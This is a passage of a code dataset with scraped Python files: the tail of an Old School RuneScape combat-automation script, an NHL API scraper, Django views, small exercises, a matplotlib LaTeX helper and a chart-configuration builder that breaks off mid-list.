dream.')\n start_dream()\n elif 'skills' in data and \\\n 'hitpoints' in data['skills'] and \\\n data['skills']['hitpoints']['boostedLevel'] < minimum_eat_health and 'inv' in data:\n food = osrs.inv.are_items_in_inventory(data['inv'], food_to_eat)\n if not food:\n print('out of food')\n else:\n osrs.move.move_and_click(food[0], food[1], 4, 4)\n osrs.move.click_off_screen(300, 1000, 300, 1100, False)\n osrs.clock.random_sleep(1, 1.1)\n elif (datetime.datetime.now() - start_time).total_seconds() > 900 and 'inv' in data:\n print('Potting up.')\n super_combat = osrs.inv.are_items_in_inventory_v2(data['inv'], [12695, 12697, 12699, 12701])\n if not super_combat:\n print('out of super combats')\n else:\n osrs.move.move_and_click(super_combat['x'], super_combat['y'], 4, 4)\n osrs.move.click_off_screen(300, 1000, 300, 700, False)\n start_time = datetime.datetime.now()\n osrs.clock.random_sleep(0.5, 0.6)\n elif 'interactingWith' in data:\n print('In combat, no action needed.')\n osrs.clock.random_sleep(0.5, 0.6)\n\n\ndef bank_and_return():\n osrs.move.run_to_loc(nmz_to_bank, port)\n osrs.clock.random_sleep(0.5, 0.6)\n bank = osrs.server.get_game_object('2614,3094,0', '10356', port)\n osrs.move.move_and_click(bank['x'], bank['y'], 3, 3)\n osrs.bank.wait_for_bank_interface(port)\n osrs.clock.random_sleep(0.5, 0.6)\n osrs.bank.bank_dump_inv(port)\n bank_data = osrs.bank.get_bank_data(port)\n super_combat = osrs.inv.is_item_in_inventory_v2(bank_data, 12695)\n osrs.move.right_click_menu_select(super_combat, 2, port)\n osrs.clock.random_sleep(0.3, 0.4)\n monkfish = osrs.inv.is_item_in_inventory_v2(bank_data, 7946)\n osrs.move.move_and_click(monkfish['x'], monkfish['y'], 3, 3)\n osrs.clock.random_sleep(0.3, 0.4)\n keyboard.send('esc')\n osrs.clock.random_sleep(0.3, 0.4)\n osrs.move.run_to_loc(nmz_to_bank[::-1], port)\n osrs.clock.random_sleep(0.6, 0.7)\n\n\ndef start_dream():\n dom = osrs.server.get_npc_by_id('1120', port)\n osrs.move.move_and_click(dom['x'], dom['y'], 2, 2)\n while True:\n chat = osrs.server.get_chat_options(port)\n if chat:\n for i, option in enumerate(chat):\n if 'Customisable Rumble' in option:\n keyboard.send(str(i))\n break\n break\n osrs.clock.random_sleep(1, 1.1)\n keyboard.send('space')\n osrs.clock.random_sleep(1, 1.1)\n keyboard.send('1')\n osrs.clock.random_sleep(0.6, 0.7)\n pot = osrs.server.get_game_object('2605,3117,0', '26291', port)\n osrs.move.move_and_click(pot['x'], pot['y'], 1, 3)\n osrs.clock.random_sleep(0.5, 0.6)\n osrs.move.wait_until_stationary(port)\n osrs.clock.random_sleep(1, 1.1)\n while True:\n accept = osrs.server.get_widget('129,6', port)\n if accept:\n osrs.move.move_and_click(accept['x'], accept['y'], 6, 3)\n break\n while True:\n loc = osrs.server.get_world_location(port)\n if 'z' in loc and loc['z'] == 3:\n osrs.clock.random_sleep(1, 1.1)\n break\n loc = osrs.server.get_world_location(port)\n osrs.move.run_to_loc(['{},{},3'.format(loc['x'] - 5, loc['y'] + 14)], port) # for whatever reason, the world points are different in NMZ.\n\n\nmain()","repo_name":"glandon22/AutoOldSchool","sub_path":"combat/nmz_no_absorb.py","file_name":"nmz_no_absorb.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19526425837","text":"\"\"\"\nMultiple Scrapers from the Hockey Data API\n==========================================\n\nWebsite for API documentation\nhttps://gitlab.com/dword4/nhlapi\n\nStructure:\nScrapers - Team Info, Roster Info,\n\nInsert SQLite - Team Info,\n\"\"\"\n\nimport pandas as pd\nimport requests\nimport json\nimport pprint\nimport sqlite3\nfrom pandas.io.json import json_normalize\n\nconn = sqlite3.connect('/Users/Ghodgson/Databases/nhl_data.db')\nc = conn.cursor()\n\ndef get_team_info():\n # Connect to the website and pretty print the json in a readable format\n URL = 'https://statsapi.web.nhl.com/api/v1/teams/{}'\n #r = requests.get(URL)\n #data = r.json()\n #pprint.pprint(data)\n # Loop that collects data for all teams that are both active and inactive\n\n all_team_frames = []\n for i in range(1,55):\n r = requests.get(URL.format(i))\n df = r.json()\n team_df = json_normalize(df['teams'])\n team_name = team_df.iloc[0]['name'].encode('ascii', 'ignore')\n print(\"Processing.........{}\".format(team_name))\n all_team_frames.append(team_df)\n\n team_concat = pd.concat(all_team_frames, ignore_index=True)\n team_concat.head()\n team_concat.info()\n\n team_concat.columns = team_concat.columns.str.replace('.', '_')\n team_final = team_concat.values.tolist()\n return team_final\n\n\n\ndef get_current_roster_info():\n # Select team IDs of all current teams\n c.execute(\"SELECT id FROM nhl_team_info_all WHERE active = 1\")\n a = c.fetchall()\n output = [i[0] for i in a]\n\n # Connect to the website and pretty print the json in a readable format\n URL = 'https://statsapi.web.nhl.com/api/v1/teams/4/?expand=team.roster'\n r = requests.get(URL)\n data = r.json()\n pprint.pprint(data)\n #team_df = json_normalize(data['teams'])\n roster_team_df = data['teams']\n\n current_roster = roster_team_df[0]['roster']['roster']\n len(current_roster)\n for i in range(0, len(current_roster)):\n print(current_roster[i])\n\n\n\n\n\n\"\"\"\nFunctions for inserting data into SQLite database\n\"\"\"\n\ndef insert_team_info():\n conn = sqlite3.connect('/Users/Ghodgson/Databases/nhl_data.db')\n c = conn.cursor()\n for item in team_final:\n c.execute('''insert into nhl_team_info_all values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)''', item)\n # Lots of time was wasted here, conn.commit() finally pushed the data into the database.\n conn.commit()\n\n c.execute(\"SELECT * FROM nhl_team_info_all\")\n c.fetchall()\n\n conn.close()\n print(\"Finished inserting team info.\")\n\n\n\n\n\n# Run Scrapers\nget_team_info()\n\n\n\n# Run SQLite Insert Statements\ninsert_team_info()\n\n","repo_name":"Gregistrar/APIs","sub_path":"hockey_data/hockey_scraper.py","file_name":"hockey_scraper.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3837350441","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom asesorias import models, forms\nfrom asesorias.vistas.vistasAdministradorPrincipal import \\\n checkAdministradorPrincipal\nfrom asesorias.utils import vistasPDF\n\n# Comprueba si existe un centro y, de ser asi, lo devuelve.\ndef obtenerCentro(centro):\n try:\n # Obtiene el centro cuyo nombre es centro.\n resultado = models.Centro.objects.get(nombre_centro=centro)\n except:\n resultado = False\n return resultado\n\n@checkAdministradorPrincipal\n@login_required\ndef addCentro(request):\n # Se ha rellenado el formulario.\n if request.method == 'POST':\n # Se obtienen los valores y se valida.\n form = forms.CentroForm(request.POST)\n if form.is_valid():\n # Se guarda la informacion del formulario en el sistema.\n form.save()\n # Redirige a la pagina de listar centros.\n return HttpResponseRedirect(reverse('listCentro',\n kwargs={'orden': 'nombre_centro'}))\n # Si aun no se ha rellenado el formulario, se genera uno en blanco.\n else:\n form = forms.CentroForm()\n\n return render_to_response('asesorias/Centro/addCentro.html',\n {'user': request.user, 'form': form})\n\n@checkAdministradorPrincipal\n@login_required\ndef editCentro(request, centro):\n # Se obtiene la instancia del centro.\n instancia_centro = obtenerCentro(centro)\n # Si existe se edita.\n if instancia_centro:\n # Se carga el formulario para el centro existente.\n form = forms.CentroForm(instance=instancia_centro)\n # Se ha modificado el formulario original.\n if request.method == 'POST':\n # Se actualiza el formulario con la nueva informacion.\n form = forms.CentroForm(request.POST,\n instance=instancia_centro)\n # Si es valido se guarda.\n if form.is_valid():\n form.save()\n # Redirige a la pagina de listar centros.\n return HttpResponseRedirect(reverse('listCentro',\n kwargs={'orden': 'nombre_centro'}))\n # El centro no existe.\n else:\n form = False\n return render_to_response('asesorias/Centro/editCentro.html',\n {'user': request.user, 'form': form})\n\n@checkAdministradorPrincipal\n@login_required\ndef delCentro(request, centro):\n # Se obtiene la instancia del centro.\n instancia_centro = obtenerCentro(centro)\n # Si existe se elimina.\n if instancia_centro:\n # Se carga el formulario de confirmacion.\n form = forms.RealizarConfirmacion()\n # Se ha modificado el formulario original.\n if request.method == 'POST':\n form = forms.RealizarConfirmacion(request.POST)\n confirmacion = request.POST['confirmacion']\n\n if confirmacion == 'True':\n instancia_centro.borrar()\n\n # Redirige a la pagina de listar centros.\n return HttpResponseRedirect(reverse('listCentro',\n kwargs={'orden': 'nombre_centro'}))\n # El centro no existe.\n else:\n form = True\n return render_to_response('asesorias/Centro/delCentro.html',\n {'user': request.user, 'form': form})\n\n@checkAdministradorPrincipal\n@login_required\ndef listCentro(request, orden):\n # Se obtiene una lista con todos los centros.\n lista_centros = models.Centro.objects.order_by('nombre_centro')\n\n # Se ha realizado una busqueda.\n if request.method == 'POST':\n # Se obtienen los valores y se valida.\n form = forms.SearchForm(request.POST)\n # Si es valido se realiza la busqueda.\n if form.is_valid():\n busqueda = request.POST['busqueda']\n lista_centros = \\\n lista_centros.filter(nombre_centro__contains=busqueda)\n else:\n busqueda = False\n # No se ha realizado busqueda.\n else:\n # Formulario para una posible busqueda.\n form = forms.SearchForm()\n busqueda = False\n\n if orden == '_nombre_centro':\n lista_centros = lista_centros.reverse()\n\n return render_to_response('asesorias/Centro/listCentro.html',\n {'user': request.user, 'form': form,\n 'lista_centros': lista_centros, 'busqueda': busqueda,\n 'orden': orden})\n\n@checkAdministradorPrincipal\n@login_required\ndef generarPDFListaCentros(request, busqueda):\n lista_centros = models.Centro.objects.order_by('nombre_centro')\n\n # Se ha realizado una busqueda.\n if busqueda != 'False':\n lista_centros = \\\n lista_centros.filter(nombre_centro__contains=busqueda)\n\n return vistasPDF.render_to_pdf('asesorias/plantilla_pdf.html',\n {'mylist': lista_centros, 'name': 'centros',})\n","repo_name":"bartsanchez/asesorias","sub_path":"Codigo/proyecto/asesorias/vistas/AdministradorPrincipal/vistasCentro.py","file_name":"vistasCentro.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8060494424","text":"c = ca = 0\nl = []\nwhile True:\n c += 1\n n = input(f'Nome da {c}ª pessoa: ').upper().split()[0]\n n1 = int(input(f\"Quanto pesa o [{n}]: \"))\n l.append([n, n1])\n ca += 1\n n2 = str(input('Quer continuar [S/N] : ')).lower()[0]\n while n2 not in 'sn':\n n2 = str(input('Opçao invalida [S/N] :'))\n if n2 == 'n':\n break\nco = t = ms = mn = 0\nnome1 = nome2 = ''\nli = []\nfor r in l:\n li.append(r[0])\n if co == 0:\n mn = r[1]\n ms = r[1]\n nome1 = r[0]\n nome2 = r[0]\n else:\n if r[1] < mn:\n mn = r[1]\n nome1 = r[0]\n if r[1] > ms:\n ms = r[1]\n nome2 = r[0]\n co += 1\nprint(li)\nprint(f'Ao todo voce cadastrou {ca} pessoas.')\nprint(f'O maior peso foi de: {ms:.2f}Kg de {nome2} ')\nprint(f'O menor peso digitgado foi de: {mn:.2f}Kg de {nome1}')\n","repo_name":"Rachidomar1523/pythonExercicios","sub_path":"lista peso+/maior menor peso.py","file_name":"maior menor peso.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28696805305","text":"\"\"\"\r\nProgram name: image_get_green_1.py\r\nObjective: Separate the green only from a picture.\r\n\r\nKeywords: canvas, image, color adjust, jpg, PIL, Python Imaging Library\r\n============================================================================79\r\n \r\nExplanation: The \"split\" method separates the image into red, green and blue\r\nbands. The \"point(lambda i: i * intensity)\" method multiplies the color value\r\nfor each pixel in a band by an 'intensity' value and the\r\n\"merge(im_1.mode, new_source)\" method re-combines the resultant bands into \r\na new image.\r\n\r\nIn this example PIL and Tkinter are being used together.\r\nIf you use \"from Tkinter import *, you seem to get namespace confusion:\r\nThe interpreter says \" im_1 = Image.open(\"/a_constr/pics1/redcar.jpg\")\r\nAttributeError: class Image has no attribute 'open' \",\r\nbut if you just say \" import Tkinter\" it seems OK.\r\nBut of course now you have prefix all Tkinter methods with \" Tkinter. \"\r\n\r\nAuthor: Mike Ohlson de Fine\r\n\r\n\"\"\"\r\n#image_get_green_1.py\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nimport ImageEnhance\r\nimport Image\r\n\r\nred_frac = 1.0\r\ngreen_frac = 1.0\r\nblue_frac = 1.0\r\n\r\nim_1 = Image.open(\"/a_constr/pics1/dusi_leo_1.jpg\")\r\n\r\n# split the image into individual bands\r\nsource = im_1.split()\r\nR, G, B = 0, 1, 2\r\n\r\n# Assign color intensity bands, zero for red and blue.\r\nred_band = source[R].point(lambda i: i * 0.0)\r\ngreen_band = source[G]\r\nblue_band = source[B].point(lambda i: i * 0.0)\r\nnew_source = [red_band, green_band, blue_band]\r\n\r\n# Merge (add) the three color bands\r\nim_2 = Image.merge(im_1.mode, new_source)\r\n\r\nim_2.show()\r\n#================================================================\r\n\r\n","repo_name":"anyatran/school","sub_path":"CG/SciPy/image_get_green_1.py","file_name":"image_get_green_1.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13915362907","text":"r\"\"\"\n ____ ____ _ __ __ ____ ___\n | _ \\| _ \\ / \\ | \\/ |/ ___/ _ \\\n | | | | |_) | / _ \\ | |\\/| | | | | | |\n | |_| | _ < / ___ \\| | | | |__| |_| |\n |____/|_| \\_\\/_/ \\_\\_| |_|\\____\\___/\n research group\n dramco.be/\n\n KU Leuven - Technology Campus Gent,\n Gebroeders De Smetstraat 1,\n B-9000 Gent, Belgium\n\n File: LatexifyMatplotlib.py\n Created: 2019-01-10\n Author: Gilles Callebaut\n Description:\n\"\"\"\n\nfrom math import sqrt\nimport matplotlib as mpl\n\nmpl.use('pgf')\n\nSPINE_COLOR = 'gray'\n\n\ndef latexify(fig_width=None, fig_height=None, columns=1):\n \"\"\"Set up matplotlib's RC params for LaTeX plotting.\n Call this before plotting a figure.\n\n Parameters\n ----------\n fig_width : float, optional, inches\n fig_height : float, optional, inches\n columns : {1, 2}\n \"\"\"\n\n # code adapted from http://www.scipy.org/Cookbook/Matplotlib/LaTeX_Examples\n\n # Width and max height in inches for IEEE journals taken from\n # computer.org/cms/Computer.org/Journal%20templates/transactions_art_guide.pdf\n\n assert (columns in [1, 2])\n\n if fig_width is None:\n fig_width = 2.7 if columns == 1 else 6.9 # width in inches\n\n if fig_height is None:\n golden_mean = (sqrt(5) - 1.0) / 2.0 # Aesthetic ratio\n fig_height = fig_width * golden_mean # height in inches\n\n MAX_HEIGHT_INCHES = 8.0\n if fig_height > MAX_HEIGHT_INCHES:\n print(\"WARNING: fig_height too large:\" + fig_height +\n \"so will reduce to\" + MAX_HEIGHT_INCHES + \"inches.\")\n fig_height = MAX_HEIGHT_INCHES\n\n params = {\n 'backend': 'ps',\n 'axes.labelsize': 8,\n 'axes.titlesize': 8,\n 'legend.fontsize': 8,\n 'xtick.labelsize': 8,\n 'ytick.labelsize': 8,\n 'text.usetex': True,\n \"pgf.rcfonts\": False,\n \"pgf.texsystem\": \"lualatex\",\n 'figure.figsize': [fig_width, fig_height],\n 'font.family': 'serif',\n \"pgf.preamble\": [\n r\"\\usepackage[utf8x]{inputenc}\", # use utf8 fonts\n r\"\\usepackage[T1]{fontenc}\", # plots will be generated\n r\"\\usepackage[detect-all]{siunitx}\", # to use si units,\n r\"\\DeclareSIUnit{\\belmilliwatt}{Bm}\",\n r\"\\DeclareSIUnit{\\dBm}{\\deci\\belmilliwatt}\",\n r\"\\usepackage{booktabs}\",\n r\"\\renewcommand{\\arraystretch}{1.2}\"\n ]\n }\n\n mpl.rcParams.update(params)\n\n\ndef format_axes(ax):\n for spine in ['top', 'right']:\n ax.spines[spine].set_visible(False)\n\n for spine in ['left', 'bottom']:\n ax.spines[spine].set_color(SPINE_COLOR)\n ax.spines[spine].set_linewidth(0.5)\n\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n for axis in [ax.xaxis, ax.yaxis]:\n axis.set_tick_params(direction='out', color=SPINE_COLOR)\n\n return ax\n\ndef legend(plt):\n plt.legend(framealpha=0.0)\n\ndef save(plt, filename):\n plt.savefig(filename, format=\"pdf\", dpi=1200,\n bbox_inches='tight')\n","repo_name":"DRAMCO/LoRaCoverageMeasurements","sub_path":"processing/LatexifyMatplotlib/LatexifyMatplotlib.py","file_name":"LatexifyMatplotlib.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72801552428","text":"import serial\nimport time\nimport os\n\nport = \"/dev/serial0\"\ns = serial.Serial(port, 9600, timeout = 1)\n\ncmd = \"1\"\ns.write(cmd.encode(\"ascii\"))\n\npck = s.read(8)\nprint(pck.decode(\"ascii\"))\n\ns.close()\n\n","repo_name":"younghoeun/abt","sub_path":"python/cockpit.py","file_name":"cockpit.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11729221339","text":"\"\"\"\nEliahu Satat - 204395644\nDaniel Abergel - 315660712\n\"\"\"\nimport doctest\nimport numpy as np\nimport math\n\nclass Point():\n\n def __init__(self, point ,pulse = None ,gender = None):\n \"\"\"\n A constructor if its got one param (Point or string)\n used as copy constructor or string constructor\n if its got 3 param - regular constructor\n :param point: Point or string or int ( = temperature)\n :param pulse: int ( = pulse)\n :param gender: int ( = gender)\n checked!\n >>> p = Point(3, 2 ,-1)\n >>> p1 = Point(p)\n >>> print(p1 == p)\n True\n >>> p2 = Point(\"3 -1 2\")\n >>> print(p2 == p)\n True\n \"\"\"\n if(pulse == None): # if its got only one param\n if isinstance(point ,str): # if its line = string from file string constructor\n arr = point.split()\n self.temperature = float(arr[0])\n if (arr[1] == \"1\"):\n self.gender = int(arr[1])\n else:\n self.gender = -1\n self.pulse = float(arr[2])\n #self.weight = np.longdouble(1)\n self.weight = 1.0\n else: # if its point = copy constructor\n self.temperature = point.temperature\n self.gender = point.gender\n self.pulse = point.pulse\n #self.weight = np.longdouble(1)\n self.weight = 1.0\n\n else: # got temperature and pulse - and built the point\n self.temperature = point\n self.gender = gender\n self.pulse = pulse\n #self.weight = np.longdouble(1)\n self.weight = 1.0\n\n\n def distance(self , p):\n return math.sqrt((self.temperature - p.temperature)**2 + (self.pulse - p.pulse)**2)\n\n\n def __str__(self):\n return 'the point is : {} , {} , {} '.format(self.temperature , self.pulse , self.gender)\n\n def __eq__(self, other):\n return (self.temperature == other.temperature)and(self.gender == other.gender)and(self.pulse == other.pulse)and(self.weight == other.weight)\n\n\nif __name__ == '__main__':\n (failures, tests) = doctest.testmod(report=True)\n print(\"{} failures, {} tests\".format(failures, tests))\n\n","repo_name":"eliahusatat/Machine-Learning","sub_path":"Point.py","file_name":"Point.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20855573504","text":"import pandas as pd\nimport json\nimport math\n\n\ndef truncate(data):\n import math\n\n result = sum(data) / 1000000000\n decimal = str(result).split(\".\")\n new = list(decimal[-1])\n new.insert(0, \".\")\n new = \"\".join(new)\n if float(new) > 0.5:\n res = math.ceil(result)\n return int(res)\n else:\n return int(decimal[0])\n\n\ndef process_request(data, json_data):\n # input file location\n result = []\n d = {}\n for col in data.columns:\n d[col] = data[col].tolist()\n result.append(d)\n category_label = []\n for col in data.columns:\n if col != \"Series Label\":\n d = {\n \"name\": col,\n \"parentName\": \"CategoryAxis\",\n \"DisplayText\": \"\",\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"labelDefaults\": [\n {\n \"rotation\": 0,\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontColor\": \"\",\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"bold\": False,\n }\n ],\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"fontColor\": \"\",\n \"rotation\": 0,\n \"bold\": False,\n }\n category_label.append(d)\n\n category_axis = {\n \"labelName\": \"CategoryAxis\",\n \"parentName\": \"Axis\",\n \"labelrows\": \"\",\n \"barGap\": \"\",\n \"name\": \"parent\",\n \"DisplayText\": \"\",\n \"labelDefaults\": {\n \"rotation\": 0,\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontColor\": \"\",\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"bold\": False,\n },\n \"fontColor\": \"\",\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"bold\": False,\n \"visible\": True,\n \"categories\": \"Do Not Order\",\n \"series\": \"By Each Category\",\n \"titleLabel\": \"\",\n \"titleGap\": \"\",\n \"titleposition\": \"\",\n \"titleFont\": \"Arial\",\n \"titleSize\": 16,\n \"titleBold\": False,\n \"titleColor\": \"black\",\n \"categoryLabel\": category_label,\n }\n\n result_data = []\n\n data = data.sort_values(list(data.columns)[1], ascending=False)\n for col in data.columns:\n dt = {}\n if col != \"Series Label\":\n df = data.sort_values(col, ascending=False)\n options = [\"Other\", \"other\"]\n df1 = df.loc[df[\"Series Label\"].isin(options)]\n df = df.loc[~df[\"Series Label\"].isin(options)]\n df = df.append(df1, ignore_index=True)\n dt[col] = dict(zip(df[\"Series Label\"], df[col]))\n result_data.append(dt)\n\n javascript = []\n x_ = 0\n sum_category = {}\n for i in result_data:\n for cat, comp in i.items():\n sum_category[cat] = sum(comp.values())\n\n total = {}\n for cat, val in sum_category.items():\n total[cat] = truncate([val])\n\n summaryAxisLabel = []\n for ke, val in total.items():\n item = {\n \"name\": \"$\" + str(val) + \"b\",\n \"DisplayText\": \"\",\n \"decimalPlaceValue\": \"\",\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"fontColor\": \"\",\n \"rotation\": 0,\n \"bold\": False,\n }\n summaryAxisLabel.append(item)\n\n summary_axis = {\n \"labelDefaults\": {\n \"rotation\": 0,\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\": 10,\n \"bold\": False,\n },\n \"visible\": True,\n \"titleLabel\": \"\",\n \"titleGap\": \"\",\n \"titleposition\": \"\",\n \"titleFont\": \"\",\n \"titleSize\": \"\",\n \"titleBold\": False,\n \"titleColor\": \"\",\n \"decimalPlaceValue\": \"\",\n \"summayAxisLabel\": summaryAxisLabel,\n }\n\n value_axis = {\n \"name\": \"parent\",\n \"DisplayText\": \"\",\n \"majorStep\": \"\",\n \"min\": \"\",\n \"max\": \"\",\n \"majorTick\": \"\",\n \"fullspecifiedMajorticks\": [{\"value\": \"\", \"label\": True}],\n \"visible\": True,\n \"bold\": False,\n \"titleLabel\": \"\",\n \"titleGap\": \"\",\n \"titleposition\": \"\",\n \"titleFont\": \"\",\n \"titleSize\": \"\",\n \"titleBold\": False,\n \"titleColor\": \"green\",\n \"labels\": {\n \"labelFormat\": \"\",\n \"maximumLabelFormat\": \"\",\n \"minimumLabelFormat\": \"\",\n },\n }\n\n chart_size = {\"aspectratio\": \"\", \"displayWidth\": \"\", \"ppi\": \"\"}\n\n child = []\n for col in data.columns:\n if col != \"Series Label\":\n c = {\n \"name\": col,\n \"DisplayText\": \"\",\n \"decimalPlaceValue\": \"\",\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"fontColor\": \"\",\n \"rotation\": 0,\n \"bold\": \"true\",\n \"brush\": \"\",\n \"fill\": \"\",\n }\n\n child.append(c)\n\n dataLabels = []\n for i in data[\"Series Label\"]:\n dt = {\n \"name\": i,\n \"DisplayText\": \"\",\n \"decimalPlaceValue\": \"\",\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"fontColor\": \"\",\n \"rotation\": 0,\n \"bold\": \"true\",\n \"brush\": \"\",\n \"fill\": \"\",\n \"child\": child,\n }\n dataLabels.append(dt)\n\n subtitle = {\n \"name\": \"2015 sales\",\n \"DisplayText\": \"2015 Sales\",\n \"fontFamily\": \"Calibri\",\n \"fontSize\": 15,\n \"fontColor\": \"black\",\n \"visible\": False,\n \"bold\": False,\n }\n\n title = {\n \"name\": \"North America Confectionary market companies\",\n \"DisplayText\": \"North America Confectionary market companies\",\n \"fontFamily\": \"Calibri\",\n \"fontSize\": 12,\n \"fontColor\": \"black\",\n \"visible\": True,\n \"pad\": 0,\n \"bold\": False,\n }\n categoryaxisorientation = {\"Label\": \"Horizontal\"}\n acquisition = {\"Labels\": data[\"Series Label\"].values.tolist()}\n showPercentage = {'visible':False}\n rollup = {\n \"label\": \"\",\n \"threshold\": 0,\n \"category threshold\": 0,\n \"companies\": [],\n \"updateCompanies\": []\n }\n list_of_colors = [\n \"skyblue\",\n \"lavender\",\n \"orange\",\n \"mediumvioletred\",\n \"rosybrown\",\n \"lightblue\",\n \"tomato\",\n \"lightsteelblue\",\n \"coral\",\n \"cornflowerblue\",\n \"cornsilk\",\n \"crimson\",\n \"lightcoral\",\n \"cyan\",\n \"darkblue\",\n \"lightgreen\",\n \"darkcyan\",\n \"darkgoldenrod\",\n \"darkgray\",\n \"darkgrey\",\n \"darkgreen\",\n \"darkkhaki\",\n \"darkmagenta\",\n \"darkolivegreen\",\n \"darkorange\",\n \"aliceblue\",\n \"aqua\",\n \"aquamarine\",\n \"azure\",\n \"beige\",\n \"bisque\",\n \"blanchedalmond\",\n \"blue\",\n \"blueviolet\",\n \"darkviolet\",\n \"deeppink\",\n \"deepskyblue\",\n \"dimgray\",\n \"dimgrey\",\n \"dodgerblue\",\n \"firebrick\",\n \"forestgreen\",\n \"fuchsia\",\n \"gainsboro\",\n \"gold\",\n \"goldenrod\",\n \"gray\",\n \"green\",\n \"greenyellow\",\n \"honeydew\",\n \"hotpink\",\n \"indigo\",\n \"ivory\",\n \"khaki\",\n \"lavenderblush\",\n \"lawngreen\",\n \"lemonchiffon\",\n \"darkslateblue\",\n \"darkturquoise\",\n \"lightgoldenrodyellow\",\n \"lightgray\",\n \"lightgrey\",\n \"darkslategray\",\n \"darkslategrey\",\n \"green\",\n \"lightsalmon\",\n \"lightseagreen\",\n \"lightskyblue\",\n \"lightslategray\",\n \"lightslategrey\",\n \"lightpink\",\n \"lightyellow\",\n \"lime\",\n \"limegreen\",\n \"linen\",\n \"magenta\",\n \"maroon\",\n \"mediumaquamarine\",\n \"mediumblue\",\n \"mediumorchid\",\n \"mediumpurple\",\n \"mediumseagreen\",\n \"mediumslateblue\",\n \"mediumspringgreen\",\n \"mediumturquoise\",\n \"lightcyan\",\n \"midnightblue\",\n \"mintcream\",\n \"mistyrose\",\n \"moccasin\",\n \"oldlace\",\n \"olive\",\n \"olivedrab\",\n \"indianred\",\n \"orange\",\n \"orangered\",\n \"orchid\",\n \"palegoldenrod\",\n \"palegreen\",\n \"paleturquoise\",\n \"palevioletred\",\n \"papayawhip\",\n \"peachpuff\",\n \"peru\",\n \"pink\",\n \"plum\",\n \"powderblue\",\n \"purple\",\n \"red\",\n \"royalblue\",\n \"rebeccapurple\",\n \"saddlebrown\",\n \"darksalmon\",\n \"salmon\",\n \"sandybrown\",\n \"seagreen\",\n \"seashell\",\n \"sienna\",\n \"silver\",\n \"slateblue\",\n \"slategray\",\n \"slategrey\",\n \"snow\",\n \"brown\",\n \"springgreen\",\n \"steelblue\",\n \"tan\",\n \"teal\",\n \"thistle\",\n \"turquoise\",\n \"violet\",\n \"wheat\",\n \"yellow\",\n \"yellowgreen\",\n \"#594b8b\",\n \"#c73c39\",\n \"#07652f\",\n \"#101dd2\",\n \"#297f70\",\n \"#a24592\",\n \"#7f9339\",\n \"#d9621a\",\n \"#94f82f\",\n \"#599d06\",\n \"#721b3f\",\n \"#fa05b0\",\n \"#da1f7d\",\n \"#9f2137\",\n \"#e298a1\",\n \"#aad1d0\",\n \"#8c2967\",\n \"#fa2d61\",\n \"#851ea6\",\n \"#a4578c\",\n \"#79b8f0\",\n \"#b36d21\",\n \"#90038d\",\n \"#6a2a88\",\n \"#1e8e0e\",\n \"#6672c0\",\n \"#485869\",\n \"#30da83\",\n \"#f1b780\",\n \"#808313\",\n \"#6e8d48\",\n \"#13205a\",\n \"#5e6a9b\",\n \"#bccf2b\",\n \"#a5ecfd\",\n \"#279a2f\",\n \"#8fc4c5\",\n \"#09071f\",\n \"#2f8404\",\n \"#67d6ef\",\n \"#6bf237\",\n \"#9c9019\",\n \"#b4f73a\",\n \"#b8bc9c\",\n \"#0414f5\",\n \"#ff667b\",\n \"#5ef62b\",\n \"#55c169\",\n \"#dccd03\",\n \"#2fb896\",\n \"#561ec8\",\n \"#ad1f6f\",\n \"#b0b8c8\",\n \"#45cba1\",\n \"#23833f\",\n \"#ed300a\",\n \"#8dd65b\",\n \"#6db953\",\n \"#4c1006\",\n \"#bf6ddc\",\n \"#5dc27d\",\n \"#8fe992\",\n \"#3f5571\",\n \"#02ad96\",\n \"#0f8f10\",\n \"#4b6013\",\n \"#5cb1ea\",\n \"#a14f1b\",\n \"#7428aa\",\n \"#5de38d\",\n \"#124a14\",\n \"#c2242b\",\n \"#9b50e9\",\n \"#4bd258\",\n \"#9f73e7\",\n \"#41bf68\",\n \"#0d207e\",\n \"#0a9fd5\",\n \"#6f2a41\",\n \"#f1707b\",\n \"#d818ec\",\n 